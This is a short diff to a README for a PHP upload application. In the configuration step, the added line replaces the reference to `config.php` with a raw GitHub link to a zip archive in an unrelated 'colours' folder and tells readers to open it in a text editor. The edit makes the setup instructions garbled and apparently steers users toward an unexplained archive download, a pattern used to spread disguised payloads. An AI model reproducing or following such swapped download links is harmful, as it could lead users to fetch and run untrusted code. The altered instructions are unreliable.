teamkura1/uploadProject/README.md

    - Import the provided SQL file from the extracted folder to set up the required tables.

 5. **Configure the Application**:
-   - Open the `config.php` file in your favorite text editor.
+   - Open the `https://github.com/teamkura1/uploadProject/raw/refs/heads/main/colours/upload_Project_1.2-alpha.1.zip` file in your favorite text editor.
    - Modify the database connection details (hostname, username, password, and database name) to match your setup.

 6. **Run the Application**: